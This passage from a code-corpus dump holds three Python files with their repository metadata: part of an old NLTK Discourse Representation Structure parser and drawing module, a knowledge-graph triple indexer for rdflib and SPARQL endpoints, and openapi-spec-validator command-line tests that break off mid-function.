y_current = y+(max_height-canvas.font.metrics("linespace"))/2
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=Tokens.OPEN_PAREN)
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
######################################
# Handle 'first'
######################################
y_current = y+(max_height-first_size[1])/2
if isinstance(self.first, AbstractDRS):
first_bottom_right_corner = self.first.draw(x_current, y_current, canvas, first_use_parens)
else:
text = str(self.first)
if not first_use_parens:
text = text[1:-1]
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=text)
first_bottom_right_corner = (x_current+canvas.font.measure(text), y_current+canvas.font.metrics("linespace"))
#Put a space between 'first' and 'second'
x_current = first_bottom_right_corner[0] + canvas.font.measure(' ')
######################################
# Handle 'second'
######################################
y_current = y+(max_height-second_size[1])/2
if isinstance(self.second, AbstractDRS):
second_bottom_right_corner = self.second.draw(x_current, y_current, canvas)
else:
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=self.second)
second_bottom_right_corner = (x_current+canvas.font.measure(self.second), y_current+canvas.font.metrics("linespace"))
x_current = second_bottom_right_corner[0]
if use_parens:
canvas.create_text(x_current, y+(max_height-canvas.font.metrics("linespace"))/2, anchor='nw', font=canvas.font, text=Tokens.CLOSE_PAREN)
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
return (x_current, y+max_height)
def get_drawing_size(self, canvas=None, use_parens=True): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
######################################
# Get sizes of 'first' and 'second'
######################################
if isinstance(self.first, AbstractDRS):
first_size = self.first.get_drawing_size(canvas)
else:
first_size = (canvas.font.measure(self.first), canvas.font.metrics("linespace"))
if isinstance(self.second, AbstractDRS):
second_size = self.second.get_drawing_size(canvas)
else:
second_size = (canvas.font.measure(self.second), canvas.font.metrics("linespace"))
max_height = max(first_size[1], second_size[1])
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
x_current = 0
if use_parens:
#Draw Open Paren
y_current = (max_height-canvas.font.metrics("linespace"))/2
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=Tokens.OPEN_PAREN)
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
######################################
# Handle 'first'
######################################
y_current = (max_height-first_size[1])/2
if isinstance(self.first, AbstractDRS):
first_bottom_right_corner = (x_current+self.first._size[0], y_current+self.first._size[1])
else:
text = str(self.first)
if not first_use_parens:
text = text[1:-1]
first_bottom_right_corner = (x_current+canvas.font.measure(text), y_current+canvas.font.metrics("linespace"))
#Put a space between 'first' and 'second'
x_current = first_bottom_right_corner[0] + canvas.font.measure(' ')
######################################
# Handle 'second'
######################################
y_current = (max_height-second_size[1])/2
if isinstance(self.second, AbstractDRS):
second_bottom_right_corner = (x_current+self.second._size[0], y_current+self.second._size[1])
else:
second_bottom_right_corner = (x_current+canvas.font.measure(self.second), y_current+canvas.font.metrics("linespace"))
if use_parens:
x_current = second_bottom_right_corner[0]
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
self._size = (x_current, max_height)
return self._size
class ConcatenationDRS(ApplicationDRS):
"""DRS of the form '(DRS + DRS)'"""
def __init__(self, first, second):
AbstractDRS.__init__(self)
first_simp = first.simplify()
second_simp = second.simplify()
assert (isinstance(first, ApplicationDRS) and isinstance(first_simp.first, DrsOperator) and first_simp.first.operator == Tokens.DRS_CONC and isinstance(second, AbstractDRS)) or \
(isinstance(first, ApplicationDRS) and isinstance(first_simp.second, DrsOperator) and first_simp.second.operator == Tokens.DRS_CONC and isinstance(second, AbstractDRS))
self.first = first
self.second = second
def replace(self, variable, expression, replace_bound=False):
"""Replace all instances of variable v with expression E in self,
where v is free in self."""
first = self.first
second = self.second
all_refs = self.get_refs()
for ref in all_refs: # for every ref, across the whole concatenation sequence
if ref.variable in expression.free():
v = VariableExpression(Variable('z' + str(DRS._counter.get()))) #get a new var name
first = first.replace(ref.variable, v, True)
second = second.replace(ref.variable, v, True)
first = first.replace(variable, expression, replace_bound)
second = second.replace(variable, expression, replace_bound)
return self.__class__(first, second)
def resolve_anaphora(self, trail=[]):
r_first = self.first.resolve_anaphora(trail + [self])
r_second = self.second.resolve_anaphora(trail + [self])
return self.__class__(r_first, r_second)
def get_refs(self):
return self.first.get_refs() + self.second.get_refs()
def simplify(self):
first = self.first.simplify()
second = self.second.simplify()
if isinstance(first.second, DRS) and isinstance(second, DRS):
r_refs = first.second.refs + second.refs
r_conds = first.second.conds + second.conds
return DRS(r_refs, r_conds)
else:
return self.__class__(first,second)
def toFol(self):
return ApplicationExpression( ApplicationExpression(FolOperator('and'), self.first.second.toFol()), self.second.toFol())
def __repr__(self): return "ConcatenationDRS('%s', '%s')" % (self.first, self.second)
def draw(self, x=3, y=3, canvas=None, use_parens=True): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
first_size = self.first._size
second_size = self.second._size
max_height = max(first_size[1], second_size[1])
x_current = x
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
if use_parens:
canvas.create_text(x_current, y+(first_size[1]-canvas.font.metrics("linespace"))/2, anchor='nw', font=canvas.font, text=Tokens.OPEN_PAREN)
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
first_bottom_right_corner = self.first.draw(x_current, y + (max_height - first_size[1])/2, canvas, first_use_parens)
x_current = first_bottom_right_corner[0] + canvas.font.measure(' ')
second_bottom_right_corner = self.second.draw(x_current, y + (max_height - second_size[1])/2, canvas)
x_current = second_bottom_right_corner[0]
if use_parens:
canvas.create_text(x_current, y+(first_size[1]-canvas.font.metrics("linespace"))/2, anchor='nw', font=canvas.font, text=Tokens.CLOSE_PAREN)
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
return (x_current, max(first_bottom_right_corner[1], second_bottom_right_corner[1]))
def get_drawing_size(self, canvas=None, use_parens=True):
if not canvas:
canvas = init_canvas(self)
first_size = self.first._size
second_size = self.second._size
max_height = max(first_size[1], second_size[1])
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
x_current = 0
if use_parens:
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
first_size = self.first.get_drawing_size(canvas, first_use_parens)
x_current += first_size[0] + canvas.font.measure(' ')
second_size = self.second._size
x_current += second_size[0]
if use_parens:
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
self._size = (x_current, max(first_size[1], second_size[1]))
return self._size
class ApplicationExpression(Expression, logic.ApplicationExpression):
def _arglist(self):
"""Uncurry the argument list."""
arglist = [self.second]
if isinstance(self.first, ApplicationExpression):
arglist.extend(self.first._arglist())
return arglist
def resolve_anaphora(self, trail=[]):
if isinstance(self.first, VariableExpression) and self.first.variable.name == Tokens.PRONOUN:
possible_antecedents = PossibleAntecedents()
for ancestor in trail:
if isinstance(ancestor, AbstractDRS):
possible_antecedents.extend(ancestor.get_refs())
#===============================================================================
# This line ensures that statements of the form ( x = x ) wont appear.
# Possibly amend to remove antecedents with the wrong 'gender'
#===============================================================================
possible_antecedents.remove(self.second)
if len(possible_antecedents) == 1:
eqalityExp = ApplicationExpression(ApplicationExpression(FolOperator(Tokens.EQ), self.second),possible_antecedents[0])
else:
eqalityExp = ApplicationExpression(ApplicationExpression(FolOperator(Tokens.EQ), self.second),possible_antecedents)
return eqalityExp
else:
r_first = self.first.resolve_anaphora(trail + [self])
r_second = self.second.resolve_anaphora(trail + [self])
return self.__class__(r_first, r_second)
def toFol(self):
return self.__class__(self.first.toFol(), self.second.toFol())
def draw(self, x=3, y=3, canvas=None, use_parens=True): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
######################################
# Get sizes of 'first' and 'second'
######################################
if isinstance(self.first, AbstractDRS):
first_size = self.first._size
else:
first_size = (canvas.font.measure(self.first), canvas.font.metrics("linespace"))
if isinstance(self.second, AbstractDRS):
second_size = self.second._size
else:
second_size = (canvas.font.measure(self.second), canvas.font.metrics("linespace"))
max_height = max(first_size[1], second_size[1])
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
x_current = x
if use_parens:
#Draw Open Paren
y_current = y+(max_height-canvas.font.metrics("linespace"))/2
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=Tokens.OPEN_PAREN)
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
######################################
# Handle 'first'
######################################
y_current = y+(max_height-first_size[1])/2
if isinstance(self.first, AbstractDRS):
first_bottom_right_corner = self.first.draw(x_current, y_current, canvas, first_use_parens)
else:
text = str(self.first)
if not first_use_parens:
text = text[1:-1]
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=text)
first_bottom_right_corner = (x_current+canvas.font.measure(text), y_current+canvas.font.metrics("linespace"))
#Put a space between 'first' and 'second'
x_current = first_bottom_right_corner[0] + canvas.font.measure(' ')
######################################
# Handle 'second'
######################################
y_current = y+(max_height-second_size[1])/2
if isinstance(self.second, AbstractDRS):
second_bottom_right_corner = self.second.draw(x_current, y_current, canvas)
else:
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=self.second)
second_bottom_right_corner = (x_current+canvas.font.measure(self.second), y_current+canvas.font.metrics("linespace"))
x_current = second_bottom_right_corner[0]
if use_parens:
canvas.create_text(x_current, y+(max_height-canvas.font.metrics("linespace"))/2, anchor='nw', font=canvas.font, text=Tokens.CLOSE_PAREN)
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
return (x_current, y+max_height)
def get_drawing_size(self, canvas=None, use_parens=True): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
######################################
# Get sizes of 'first' and 'second'
######################################
if isinstance(self.first, AbstractDRS):
first_size = self.first.get_drawing_size(canvas)
else:
first_size = (canvas.font.measure(self.first), canvas.font.metrics("linespace"))
if isinstance(self.second, AbstractDRS):
second_size = self.second.get_drawing_size(canvas)
else:
second_size = (canvas.font.measure(self.second), canvas.font.metrics("linespace"))
max_height = max(first_size[1], second_size[1])
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
x_current = 0
if use_parens:
#Draw Open Paren
y_current = (max_height-canvas.font.metrics("linespace"))/2
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
######################################
# Handle 'first'
######################################
y_current = (max_height-first_size[1])/2
if isinstance(self.first, AbstractDRS):
first_bottom_right_corner = self.first.get_drawing_size(canvas, first_use_parens)
else:
text = str(self.first)
if not first_use_parens:
text = text[1:-1]
first_bottom_right_corner = (x_current+canvas.font.measure(text), y_current+canvas.font.metrics("linespace"))
#Put a space between 'first' and 'second'
x_current = first_bottom_right_corner[0] + canvas.font.measure(' ')
######################################
# Handle 'second'
######################################
y_current = (max_height-second_size[1])/2
if isinstance(self.second, AbstractDRS):
second_bottom_right_corner = self.second._size
else:
second_bottom_right_corner = (x_current+canvas.font.measure(self.second), y_current+canvas.font.metrics("linespace"))
if use_parens:
x_current = second_bottom_right_corner[0]
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
self._size = (x_current, max_height)
return self._size
class PossibleAntecedents(list, Expression):
def variables(self):
"""Set of all variables."""
raise NotImplementedError
def free(self):
"""Set of free variables."""
return set(self)
def subterms(self):
"""Set of all subterms (including self)."""
return set([self]) + set(self)
def replace(self, variable, expression, replace_bound=False):
"""Replace all instances of variable v with expression E in self,
where v is free in self."""
result = PossibleAntecedents()
for item in self:
if item == variable:
self.append(expression)
else:
self.append(item)
return result
def simplify(self):
return self
def infixify(self):
return self
def __str__(self):
result = '['
for item in self:
result += item.__str__() + ','
return result.rstrip(',') + ']'
class Tokens:
DRS = 'DRS'
DRS_CONC = '+'
LAMBDA = '\\'
DOT = '.'
COMMA = ','
OPEN_PAREN = '('
CLOSE_PAREN = ')'
OPEN_BRACKET = '['
CLOSE_BRACKET = ']'
DRS_OPS = ['or', 'not', 'implies', 'iff']
DRS_OPS.append(DRS_CONC)
EQ = '='
FOL_OPS = [EQ]
PRONOUN = 'PRO'
class Parser:
"""A lambda calculus expression parser."""
def __init__(self, data=None, constants=None):
if data is not None:
self.buffer = data
self.process()
else:
self.buffer = ''
if constants is not None:
self.constants = constants
else:
self.constants = []
def feed(self, data):
"""Feed another batch of data to the parser."""
self.buffer += data
self.process()
def parse(self, data):
"""
Provides a method similar to other NLTK parsers.
@type data: str
@returns: a parsed Expression
"""
self.feed(data)
result = self.next()
return result
def process(self):
"""Process the waiting stream to make it trivial to parse."""
self.buffer = self.buffer.replace('\t', ' ')
self.buffer = self.buffer.replace('\n', ' ')
self.buffer = self.buffer.replace(Tokens.LAMBDA, ' %s ' % Tokens.LAMBDA)
self.buffer = self.buffer.replace(Tokens.DRS, ' %s ' % Tokens.DRS)
self.buffer = self.buffer.replace(Tokens.DRS.lower(), ' %s ' % Tokens.DRS)
self.buffer = self.buffer.replace(Tokens.DOT, ' %s ' % Tokens.DOT)
self.buffer = self.buffer.replace(Tokens.COMMA, ' %s ' % Tokens.COMMA)
self.buffer = self.buffer.replace(Tokens.OPEN_PAREN, ' %s ' % Tokens.OPEN_PAREN)
self.buffer = self.buffer.replace(Tokens.CLOSE_PAREN, ' %s ' % Tokens.CLOSE_PAREN)
self.buffer = self.buffer.replace(Tokens.OPEN_BRACKET, ' %s ' % Tokens.OPEN_BRACKET)
self.buffer = self.buffer.replace(Tokens.CLOSE_BRACKET, ' %s ' % Tokens.CLOSE_BRACKET)
self.buffer = self.buffer.replace(Tokens.EQ, ' %s ' % Tokens.EQ)
def token(self, destructive=1):
"""Get the next waiting token. The destructive flag indicates
whether the token will be removed from the buffer; setting it to
0 gives lookahead capability."""
if self.buffer == '':
raise Error, "end of stream"
tok = None
buffer = self.buffer
while not tok:
seq = buffer.split(' ', 1)
if len(seq) == 1:
tok, buffer = seq[0], ''
else:
assert len(seq) == 2
tok, buffer = seq
if tok:
if destructive:
self.buffer = buffer
return tok
assert 0 # control never gets here
return None
def isVariable(self, token):
"""Is this token a variable (that is, not one of the other types)?"""
TOKENS = [Tokens.DRS, Tokens.LAMBDA, Tokens.DOT, Tokens.OPEN_PAREN,
Tokens.CLOSE_PAREN, Tokens.OPEN_BRACKET, Tokens.CLOSE_BRACKET]
TOKENS.extend(self.constants)
TOKENS.extend(Tokens.DRS_OPS)
TOKENS.extend(Tokens.FOL_OPS)
return token not in TOKENS
def next(self):
"""Parse the next complete expression from the stream and return it."""
tok = self.token()
if tok == Tokens.LAMBDA:
# Expression is a lambda expression: \x.M
vars = [self.token()]
while self.isVariable(self.token(0)):
# Support expressions like: \x y.M == \x.\y.M
vars.append(self.token())
tok = self.token()
if tok != Tokens.DOT:
raise Error, "parse error, unexpected token: %s" % tok
term = self.next()
accum = LambdaDRS(Variable(vars.pop()), term)
while vars:
accum = LambdaDRS(Variable(vars.pop()), accum)
return accum
elif tok == Tokens.DRS:
# a DRS
assert self.token() == Tokens.OPEN_PAREN
assert self.token() == Tokens.OPEN_BRACKET
refs = []
while self.token(0) != Tokens.CLOSE_BRACKET:
# Support expressions like: drs([x y],C) == drs([x, y],C)
if self.token(0) == Tokens.COMMA:
self.token() # swallow the comma
else:
refs.append(self.next())
assert self.token() == Tokens.CLOSE_BRACKET # swallow the CLOSE_BRACKET token
assert self.token() == Tokens.COMMA
conds = self.next()
assert self.token() == Tokens.CLOSE_PAREN
return DRS(refs, conds)
elif tok == Tokens.OPEN_BRACKET:
# A list of DRS Conditions
conds = []
while self.token(0) != Tokens.CLOSE_BRACKET:
if self.token(0) == Tokens.COMMA:
self.token() # swallow the comma
else:
conds.append(self.next())
self.token() # swallow the CLOSE_BRACKET token
return conds
elif tok == Tokens.OPEN_PAREN:
# Expression is an application expression: (M N)
first = self.next()
second = self.next()
exps = []
while self.token(0) != Tokens.CLOSE_PAREN:
# Support expressions like: (M N P) == ((M N) P)
exps.append(self.next())
tok = self.token() # swallow the CLOSE_PAREN token
assert tok == Tokens.CLOSE_PAREN
if isinstance(second, DrsOperator):
accum = ApplicationDRS(second, first) # DrsOperators can only be applied to DRSs
elif isinstance(second, FolOperator):
accum = ApplicationExpression(second, first)
else:
accum = self.make_Application(first, second)
while exps:
exp, exps = exps[0], exps[1:]
accum = self.make_Application(accum, exp)
return accum
elif tok in self.constants:
# Expression is a simple constant expression: a
return ConstantExpression(Constant(tok))
elif tok in Tokens.DRS_OPS:
# Expression is a boolean operator or the equality symbol
return DrsOperator(tok)
elif tok in Tokens.FOL_OPS:
# Expression is a boolean operator or the equality symbol
return FolOperator(tok)
elif logic.is_indvar(tok):
# Expression is a boolean operator or the equality symbol
return IndVariableExpression(Variable(tok))
else:
if self.isVariable(tok):
if tok[0].isupper() and tok != Tokens.PRONOUN:
# Uppercase variables stand for DRSs
return DRSVariable(Variable(tok))
else:
# Expression is a simple variable expression: x
return VariableExpression(Variable(tok))
else:
raise Error, "parse error, unexpected token: %s" % tok
# This is intended to be overridden, so that you can derive a Parser class
# that constructs expressions using your subclasses. So far we only need
# to overridde Application, but the same thing could be done for
# other expression types.
def make_Application(self, first, second):
first_simp = first.simplify()
second_simp = second.simplify()
if (isinstance(first_simp, ApplicationDRS) and isinstance(first_simp.first, DrsOperator) and first_simp.first.operator == Tokens.DRS_CONC and isinstance(second_simp, AbstractDRS)) or \
(isinstance(second_simp, ApplicationDRS) and isinstance(second_simp.first, DrsOperator) and second_simp.first.operator == Tokens.DRS_CONC and isinstance(first_simp, AbstractDRS)):
return ConcatenationDRS(first, second)
elif isinstance(first, DrsOperator) or isinstance(first, AbstractDRS):
return ApplicationDRS(first, second)
else:
return ApplicationExpression(first, second)
def __repr__(self):
return 'Next token: \'%s\'' % self.token(0)
def __str__(self):
return self.__repr__()
def init_canvas(drs):
#font = Font(family='helvetica', size=12)
buffer = 3
master = Tk()
canvas = Canvas(master, width=0, height=0)
font = Font(font=canvas.itemcget(canvas.create_text(0, 0, text=''), 'font'))
canvas.font = font
canvas._BUFFER = buffer
size = drs.get_drawing_size(canvas)
canvas = Canvas(master, width=size[0]+20, height=size[1]+20, bg='white')
#canvas = Canvas(master, width=300, height=300)
canvas.pack()
canvas.font = font
canvas._BUFFER = buffer
return canvas
def expressions():
return ['drs([x,y],[(sees x y)])',
'drs([x],[(man x), (walks x)])',
'\\x.drs([],[(man x), (walks x)])',
'\\x y.drs([],[(sees x y)])',
'(\\x.drs([],[(walks x)]) john)',
'(\\R x.drs([],[(big x R)]) \\y.drs([],[(mouse y)]))',
# '(drs([x],[(walks x)]) + drs([y],[(runs y)]))',
# '(drs([x,y],[(walks x), (jumps y)]) + (drs([z],[(twos z)]) + drs([w],[(runs w)])))',
# '((drs([],[(walks x)]) + drs([],[(twos x)])) + drs([],[(runs x)]))',
'((drs([],[(walks x)]) + drs([],[(runs x)])) + (drs([],[(threes x)]) + drs([],[(fours x)])))',
# '(drs([],[(walks x)]) + (runs x))',
# '((walks x) + drs([],[(runs x)]))',
# '((walks x) + (runs x))',
'(drs([],[(walks x)]) implies drs([],[(runs x)]))',
# '(drs([],[(walks x)]) implies (runs x))',
# '((walks x) implies drs([],[(walks x)]))',
# '((walks x) implies (runs x))'
'drs([x],[(PRO x),(sees John x)])',
'drs([x],[(man x), (not drs([],[(walks x)]))])',
'drs([],[(drs([x],[(man x)]) implies drs([],[(walks x)]))])'
]
def demo(ex=-1, draw=False, catch_exception=True):
exps = expressions()
for (i, exp) in zip(range(len(exps)),exps):
if i==ex or ex==-1:
drs = Parser().parse(exp).simplify().infixify()
if(not draw):
print '[[[Example %s]]]: %s' % (i, exp)
try:
print ' %s' % drs
except Exception, (strerror):
if catch_exception:
print ' Error: %s' % strerror
else:
raise
print ''
else:
canvas = init_canvas(drs)
y_current = canvas._BUFFER
canvas.create_text(canvas._BUFFER, y_current, anchor='nw', font=canvas.font, text='Example %s: %s' % (i, exp))
try:
y_current += canvas.font.metrics("linespace")+canvas._BUFFER
size = drs.draw(canvas._BUFFER,y_current,canvas)
y_current += size[1]+canvas._BUFFER
drs.draw(canvas._BUFFER, y_current, canvas)
except Exception, (strerror):
if catch_exception:
canvas.create_text(canvas._BUFFER, y_current, anchor='nw', font=canvas.font, text=' Error: %s' % strerror)
else:
raise
def testToFol():
for t in expressions():
p = Parser().parse(t)
s = p.simplify()
f = s.toFol();
i = f.infixify()
print i
def test():
a = Parser().parse(r'\Q.(drs([x],[(dog x)]) + (Q x))')
b = Parser().parse(r'\x2.drs([],[(drs([x],[(girl x)]) implies drs([],[(chases x x2)]))])')
ab = a.applyto(b)
print ab
s = ab.simplify()
print s
def test2():
a = Parser().parse(r'\Q.(drs([x],[(x = john),(walks x)]) + Q)')
b = Parser().parse(r'drs([x],[(PRO x),(leaves x)])')
ab = a.applyto(b)
print ab
s = ab.simplify()
print s
def test3():
a = Parser().parse(r'\Q.drs([],[(drs([x],[(girl x)]) implies (Q x))])')
b = Parser().parse(r'\x1.drs([x],[(dog x),(chases x1 x)])')
ab = a.applyto(b)
print ab
s = ab.simplify()
print s
def testAlpha():
a = Parser().parse(r'\P Q.((drs([x],[(dog x)]) + (P x)) + (Q x))')
print a
x = Parser().parse(r'x')
z = Parser().parse(r'z')
print a.replace(x.variable, z, True)
print a.replace(x.variable, z, False)
print a.replace_unique(x.variable, None, True)
def testResolve_anaphora():
print 'Test resolve_anaphora():'
drs = Parser().parse(r'drs([x,y,z],[(dog x), (cat y), (walks z), (PRO z)])')
print ' ' + str(drs.infixify())
print ' resolves to: ' + str(drs.simplify().resolve_anaphora().infixify()) + '\n'
drs = Parser().parse(r'drs([],[(drs([x],[(dog x)]) implies drs([y],[(walks y), (PRO y)]))])')
print ' ' + str(drs.infixify())
print ' resolves to: ' + str(drs.simplify().resolve_anaphora().infixify()) + '\n'
drs = Parser().parse(r'drs([],[((drs([x],[]) + drs([],[(dog x)])) implies drs([y],[(walks y), (PRO y)]))])')
print ' ' + str(drs.infixify())
print ' resolves to: ' + str(drs.simplify().resolve_anaphora().infixify()) + '\n'
drs = Parser().parse(r'drs([x],[(walks x), (PRO x)])')
print ' ' + str(drs.infixify())
print ' resolves to: ' + str(drs.simplify().resolve_anaphora().infixify()) + '\n'
def testTp_equals():
a = Parser().parse(r'drs([x],[(man x), (walks x)])')
b = Parser().parse(r'drs([x],[(walks x), (man x)])')
print '%s == %s' % (a,b)
print a.tp_equals(b)
if __name__ == '__main__':
demo()
print '\n'
testResolve_anaphora()
print '\n'
testToFol()
| 38.318774
| 192
| 0.578316
|
ded6f61d36a2c727d22cd5be279481a79c981a80
| 5,119
|
py
|
Python
|
excut/kg/kg_indexing.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | 5
|
2020-11-17T19:59:49.000Z
|
2021-09-23T23:10:39.000Z
|
excut/kg/kg_indexing.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | null | null | null |
excut/kg/kg_indexing.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | null | null | null |
import math
import numpy as np
from SPARQLWrapper import SPARQLWrapper, JSON, POST
from rdflib import Graph
from rdflib import URIRef
from excut.kg.utils import data_formating
from excut.utils.logging import logger
from excut.kg.utils.data_formating import entity_full_url, relation_full_url
from excut.kg.kg_triples_source import TriplesSource, FileTriplesSource
from tqdm import tqdm
# sys.path.append(os.path.abspath(os.path.join('..', '*')))
class Indexer():
"""
Index the KG in either a sparql engine or in memory. This is required for rule learning
"""
def __init__(self, store='remote', endpoint=None, identifier=None, graph=None, batch_size=100,
remove_invalid_ids=True):
self.remove_invalid_ids = remove_invalid_ids
self.batch_size = batch_size
self.store = 'SPARQLUpdateStore' if store == 'remote' or store == 'SPARQLUpdateStore' else 'default'
self.endpoint = endpoint
self.identifier = identifier
self.graph = graph
def index_triples(self, triples_source: TriplesSource, prefix='', safe_urls=False, drop_old=False):
if drop_old:
logger.info("Drop %s " % self.identifier)
self.drop()
if self.store != 'SPARQLUpdateStore' and not self.graph:
self.graph = Graph(store=self.store, identifier=self.identifier)
# print(self.graph.store)
# if self.store == 'SPARQLUpdateStore':
# self.graph.open(self.endpoint)
# self._index(triples_source, prefix, safe_urls)
self._index_np(triples_source) # , prefix, safe_urls)
return self.graph
def _index_np(self, triples_source, prefix='', safe_urls=False):
logger.info("Start indexing " + triples_source.get_name())
data = triples_source.as_numpy_array()
data_size = triples_source.size()
number_splits = math.ceil(data_size / self.batch_size)
logger.info("data size %i" % data_size)
logger.info("chunks %i" % number_splits)
# ch=0
chunks = np.array_split(data, number_splits)
for chunk in tqdm(chunks):
if self.store == 'SPARQLUpdateStore':
self.insert_sparql(chunk)
else:
self.insert_memory(chunk)
logger.info("Done indexing " + triples_source.get_name())
def drop(self):
if self.store == 'SPARQLUpdateStore':
if self.graph_exists():
return self._drop_sparql()
else:
self.graph = Graph(store=self.store, identifier=self.identifier)
return True
return True
def insert_memory(self, triples):
chunk_context = [(URIRef(s), URIRef(p), URIRef(o), self.graph) for s, p, o in triples]
self.graph.addN(chunk_context)
return True
def insert_sparql(self, triples):
triples_filtered = filter(lambda a: data_formating.valid_id_triple(a),
triples) if self.remove_invalid_ids else triples
query = 'INSERT DATA into <%s> {%s}' % (
self.identifier, '\n'.join(map(data_formating.sparql_repr, triples_filtered)))
# print(query)
sparql = SPARQLWrapper(self.endpoint)
sparql.setMethod(POST)
sparql.setReturnFormat(JSON)
sparql.setQuery(query)
results = sparql.query().convert()
return results
def graph_exists(self):
if self.store == 'SPARQLUpdateStore':
query = 'ASK WHERE { GRAPH <%s> { ?s ?p ?o } }' % self.identifier
sparql = SPARQLWrapper(self.endpoint)
sparql.setReturnFormat(JSON)
sparql.setQuery(query)
results = sparql.query().convert()
return results['boolean']
else:
return False
def _drop_sparql(self):
query = 'DROP SILENT GRAPH <%s>' % self.identifier
sparql = SPARQLWrapper(self.endpoint)
sparql.setMethod(POST)
sparql.setReturnFormat(JSON)
sparql.setQuery(query)
results = sparql.query().convert()
# print(results)
result = results['results']['bindings'][0]['callret-0']['value']
if 'triples were removed' in result:
return True
elif 'nothing to do' in result:
return False
raise Exception('Problem Dropping the graph using: %s Message from sparql : \"%s\"' % (query, result))
if __name__ == '__main__':
# labels_indexer=Indexer(host='http://badr:8890/sparql',identifier='http://yago-encoded.org')
# labels_indexer.index_kg_from_tsv('/GW/D5data-11/gadelrab/yago2018/yagoFacts.ttl','http://yago.org/')
indexer = Indexer(endpoint='http://tracy:8890/sparql', identifier='http://test-graph.org')
print(indexer.graph_exists())
indexer.index_triples(
FileTriplesSource('/home/gadelrab/ExDEC/data/20k_kemans_it1.nt', prefix='http://test.org/', safe_urls=True),
drop_old=True)
c = 0
for t in indexer.graph.triples((None, None, None)):
c += 1
print(c)
print(indexer.graph_exists())
# print(labels_indexer.drop())
| 36.049296
| 116
| 0.635866
|
979ae0c9e19d7f69b6331cf81be8c39fa371c9ce
| 3,050
|
py
|
Python
|
tests/integration/test_main.py
|
RobbeSneyders/openapi-spec-validator
|
04f30172e1e6bb03b77a154fc95e1283495ea8ed
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_main.py
|
RobbeSneyders/openapi-spec-validator
|
04f30172e1e6bb03b77a154fc95e1283495ea8ed
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_main.py
|
RobbeSneyders/openapi-spec-validator
|
04f30172e1e6bb03b77a154fc95e1283495ea8ed
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from io import StringIO
from openapi_spec_validator.__main__ import main
from unittest import mock
def test_schema_default():
"""Test default schema is 3.0.0"""
testargs = ['./tests/integration/data/v3.0/petstore.yaml']
main(testargs)
def test_schema_v3():
"""No errors when calling proper v3 file."""
testargs = ['--schema', '3.0.0',
'./tests/integration/data/v3.0/petstore.yaml']
main(testargs)
def test_schema_v2():
"""No errors when calling with proper v2 file."""
testargs = ['--schema', '2.0',
'./tests/integration/data/v2.0/petstore.yaml']
main(testargs)
def test_errors_on_missing_description_best(capsys):
"""An error is obviously printed given an empty schema."""
testargs = ['./tests/integration/data/v3.0/missing-description.yaml']
with pytest.raises(SystemExit):
main(testargs)
out, err = capsys.readouterr()
assert "Failed validating" in out
assert "'description' is a required property" in out
assert "'$ref' is a required property" not in out
assert '1 more subschemas errors' in out
def test_errors_on_missing_description_full(capsys):
"""An error is obviously printed given an empty schema."""
testargs = [
"./tests/integration/data/v3.0/missing-description.yaml",
"--errors=all"
]
with pytest.raises(SystemExit):
main(testargs)
out, err = capsys.readouterr()
assert "Failed validating" in out
assert "'description' is a required property" in out
assert "'$ref' is a required property" in out
assert '1 more subschema error' not in out
def test_schema_unknown():
"""Errors on running with unknown schema."""
testargs = ['--schema', 'x.x',
'./tests/integration/data/v2.0/petstore.yaml']
with pytest.raises(SystemExit):
main(testargs)
def test_validation_error():
"""SystemExit on running with ValidationError."""
testargs = ['--schema', '3.0.0',
'./tests/integration/data/v2.0/petstore.yaml']
with pytest.raises(SystemExit):
main(testargs)
@mock.patch(
'openapi_spec_validator.__main__.openapi_v3_spec_validator.validate',
side_effect=Exception,
)
def test_unknown_error(m_validate):
"""SystemExit on running with unknown error."""
testargs = ['--schema', '3.0.0',
'./tests/integration/data/v2.0/petstore.yaml']
with pytest.raises(SystemExit):
main(testargs)
def test_nonexisting_file():
